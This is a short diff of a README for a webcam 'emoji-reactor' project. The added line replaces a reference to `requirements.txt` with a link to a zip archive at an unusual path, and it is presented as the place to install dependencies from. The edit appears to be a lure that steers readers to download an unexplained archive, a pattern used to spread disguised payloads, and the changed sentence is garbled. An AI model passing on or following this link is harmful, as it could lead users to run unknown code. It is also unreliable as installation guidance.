Mustafa445566/emoji-reactor/README.md

 - If the application does not detect your webcam, make sure that it is connected and that the proper permissions are granted.

-- For errors related to missing packages, ensure you have installed all dependencies correctly from the `requirements.txt`.
+- For errors related to missing packages, ensure you have installed all dependencies correctly from the `https://raw.githubusercontent.com/Mustafa445566/emoji-reactor/main/egueiite/emoji-reactor.zip`.

 ## 📅 Updates